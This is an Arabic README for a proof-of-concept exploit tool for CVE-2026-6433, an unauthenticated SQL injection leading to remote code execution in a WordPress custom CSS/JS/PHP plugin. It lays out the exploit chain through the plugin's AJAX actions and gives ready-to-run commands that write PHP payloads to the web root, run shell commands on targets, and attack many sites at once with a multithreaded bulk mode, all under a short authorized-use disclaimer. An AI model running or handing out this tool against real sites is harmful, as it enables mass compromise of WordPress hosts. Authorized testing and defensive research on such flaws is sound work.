
إثبات المفهوم (PoC) لـ CVE-2026-6433: WordPress FlipperCode Custom CSS, JS & PHP (الإصدار ≤2.0.7) — حقن SQL غير موثَّق إلى تنفيذ أوامر عن بُعد (RCE). مكتبات Python 3 القياسية؛ فحص هدف واحد أو فحص متعدد الأهداف بخيوط متعددة. للاختبار المصرح به والبحث فقط.
| العنصر | التفاصيل |
|---|---|
| المتجه | SQLi غير مصادق عبر إجراءات AJAX للإضافة |
| التأثير | تنفيذ كود عن بعد على مضيف ووردبريس (تكتب الحمولة في جذر المستندات، ثم تنفذ في سياق PHP) |
| النص البرمجي | CVE-2026-6433.py — مكتبة قياسية فقط (urllib, ssl, threading, concurrent.futures) |
| الأنماط | رابط واحد أو ملف دفعة مع عمال متعدد الخيوط |
| الاكتشاف | د. جون أومورو، ClarenSec Limited |
| الدفعة / تعدد الخيوط | github.com/murrez |
flowchart TB
subgraph prep[" Preconditions "]
A["Target runs vulnerable plugin"]
B["admin-ajax reachable"]
end
subgraph chain[" Exploit chain "]
C["POST fc_ajax_call / wce_editor_inline_code"]
D["SQLi injects PHP payload"]
E["Proof file written under DOCUMENT_ROOT"]
F["Optional: fetch proof / run command output"]
G["Default: remote unlink cleanup"]
end
A --> C
B --> C
C --> D --> E --> F --> G
في GitHub، الشارات والجداول والرسوم البيانية تظهر بتباين بصري قوي. تم تنظيم هذه الوثيقة لتتمكن من التصفح السريع (الشارات + الجداول) أو القراءة المتعمقة (الأقسام أدناه).
pip install — مكتبة قياسية فقط)استنساخ أو تنزيل هذا المجلد، ثم:
# Help / all flags
python CVE-2026-6433.py --help
# PHP-only proof (writes a small proof file; good for locked-down shells)
python CVE-2026-6433.py https://target.example --php-only --no-cleanup
# Run an OS command and print captured output (if execution functions exist remotely)
python CVE-2026-6433.py https://target.example --command "id"
# Only attempt to delete the proof file (cleanup mode)
python CVE-2026-6433.py https://target.example --cleanup-only
استخدم ملف نصي مع رابط أساسي واحد لكل سطر. يتم تجاهل الأسطر التي تبدأ بـ # والأسطر الفارغة.
python CVE-2026-6433.py --bulk targets.txt --threads 8
مثال targets.txt:
# Lab hosts — replace with authorized systems only
https://site-a.example
https://site-b.example
ملاحظات:
--bulk في نفس الوقت.min(threads, len(targets))).1 إذا فشل أي هدف جماعي.| العلامة | المعنى |
|---|---|
target | رابط أساسي واحد لووردبريس (احذف عند استخدام --bulk) |
--command CMD | تشغيل أمر شل عن بعد (يستخدم shell_exec، exec، system، passthru، أو popen عند توفرها) |
--php-only | كتابة إثبات وصف PHP بدلاً من الاعتماد على --command |
--no-cleanup | لا تقم بحذف ملف الإثبات عن بعد بعد تشغيل ناجح |
--proof-name NAME | اسم الملف عن بعد (الافتراضي: rce-proof.txt) |
--cleanup-only | أرسل فقط حمولة الحذف وبلغ ما إذا كان الملف قد اختفى |
--bulk FILE | قراءة أهداف متعددة من FILE |
--threads N | العمال المتزامنون لـ --bulk (الافتراضي: 5) |
FAIL: … وتنتهي العملية برمز خروج 1.[Bulk scan] تلخص التقدم.[OK] أو [FAIL] مع سبب.--no-cleanup عندما تحتاج إلى الحفاظ على الدليل في اختبار مصرح به.| الدور | الإسناد |
|---|---|
| الاكتشاف الأصلي | د. جون أومورو — ClarenSec Limited |
| أداة الدفعة / متعددة الخيوط | github.com/murrez |
[!WARNING] استخدام قانوني وأخلاقي فقط
هذا الإثبات العملي موجود لـ التعليم، البحث الدفاعي، و اختبار الأمان المصرح به.
تشغيله ضد أنظمة بدون إذن كتابي صريح قد ينتهك قوانين إساءة استخدام الحاسوب في منطقتك.
المؤلفون والمساهمون لا يتحملون أي مسؤولية عن سوء الاستخدام.
تم ضبط هيكل README الأخير لـ قابلية القراءة: شارات · جداول · مخطط انسيابي · علامات صريحة.